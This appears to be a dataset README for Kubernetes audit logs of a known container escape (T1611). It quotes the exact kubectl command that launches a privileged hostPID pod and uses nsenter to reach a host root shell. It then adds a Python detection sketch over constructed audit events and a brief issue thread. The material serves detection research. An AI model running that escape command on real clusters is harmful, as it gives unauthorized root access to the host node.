attack_data
T1611 - k8s audit logs - nsenter container escape
This is a dataset that shows the complete lifecycle of a pod which is created using a known container escape. It tracks the initial request to create the pod, the internal k8s components provisioning it, and the eventual deletion of the pod.
These logs are the result of running the following command:
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'
This exact command is referenced in the Atomic Red Team test, the securekubernetes reference, and the tweet linked as references for this data.
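As an added example (not code from the attack_data repo, its references, or the dataset itself): a minimal detection in Python that reads kube-apiserver audit events and flags a pod create request carrying the two attributes the escape above depends on, `hostPID: true` and a privileged container, with the `nsenter` command recorded as a supporting indicator. The audit events are constructed here to follow the audit.k8s.io/v1 Event schema and are not lines from the dataset; the pod name `r00t` and user `kubernetes-admin` are assumptions made to mirror the command.

```python
"""Detection sketch over Kubernetes audit events for the hostPID + privileged
container pattern used by the nsenter escape. Added example; the events below are
constructed in the audit.k8s.io/v1 schema, not taken from the attack_data dataset."""
import json

# Constructed newline-delimited audit log, as the apiserver log backend writes it.
# Only the fields the detection reads are included; names/users are assumptions.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {   # the escape pod: hostPID + privileged container running nsenter
        "kind": "Event", "apiVersion": "audit.k8s.io/v1",
        "level": "RequestResponse", "stage": "ResponseComplete", "verb": "create",
        "user": {"username": "kubernetes-admin"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "r00t"},
        "requestObject": {"spec": {"hostPID": True, "containers": [{
            "name": "1", "image": "alpine",
            "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/bash"],
            "securityContext": {"privileged": True}}]}},
    },
    {   # benign controller-created pod, no host namespaces, no privilege
        "kind": "Event", "apiVersion": "audit.k8s.io/v1",
        "level": "RequestResponse", "stage": "ResponseComplete", "verb": "create",
        "user": {"username": "system:serviceaccount:kube-system:replicaset-controller"},
        "objectRef": {"resource": "pods", "namespace": "web", "name": "nginx-7c9f-abc12"},
        "requestObject": {"spec": {"containers": [{"name": "nginx", "image": "nginx"}]}},
    },
    {   # Metadata-level event: the policy did not capture requestObject
        "kind": "Event", "apiVersion": "audit.k8s.io/v1",
        "level": "Metadata", "stage": "ResponseComplete", "verb": "create",
        "user": {"username": "kubernetes-admin"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "unseen"},
    },
    {   # the --rm cleanup at the end of the pod's lifecycle
        "kind": "Event", "apiVersion": "audit.k8s.io/v1",
        "level": "RequestResponse", "stage": "ResponseComplete", "verb": "delete",
        "user": {"username": "kubernetes-admin"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "r00t"},
    },
])


def score_pod_create(event):
    """Return the risky attributes found on a single pod-create audit event."""
    if event.get("verb") != "create" or event.get("objectRef", {}).get("resource") != "pods":
        return []
    req = event.get("requestObject")
    if req is None:
        return []  # only Metadata was logged; the pod spec is not inspectable
    spec = req.get("spec", {})
    findings = []
    if spec.get("hostPID"):
        findings.append("hostPID")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"privileged:{c.get('name')}")
        argv = (c.get("command") or []) + (c.get("args") or [])
        # match a bare "nsenter" or a full path such as /usr/bin/nsenter
        if any(tok.split("/")[-1] == "nsenter" for tok in argv):
            findings.append(f"nsenter:{c.get('name')}")
    return findings


def detect(audit_log_text):
    """Return (namespace/name, username, findings) for every create event that
    combines hostPID with a privileged container, the minimum the escape needs."""
    hits = []
    for line in audit_log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        findings = score_pod_create(event)
        if "hostPID" in findings and any(f.startswith("privileged:") for f in findings):
            ref = event["objectRef"]
            user = event.get("user", {}).get("username")
            hits.append((f"{ref.get('namespace')}/{ref.get('name')}", user, findings))
    return hits


if __name__ == "__main__":
    for ref, user, findings in detect(SAMPLE_AUDIT_LOG):
        print(f"ALERT pod {ref} created by {user}: {', '.join(findings)}")
```

Two caveats a practitioner would want: the check only works when the audit policy records pod creates at the Request or RequestResponse level, since at Metadata level (third sample) the event is visible but carries no `requestObject`; and the `nsenter` token is deliberately not required for the alert, because the same hostPID plus privileged combination gives the attacker a way in regardless of which command is used.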
Is there an associated detection where we can use this attack_data?
I had one, but as time has gone on I think I nuked all of the work streams I had associated between security_content, attack_range, and this repo. Feel free to close this out. I won't be able to contribute here anymore.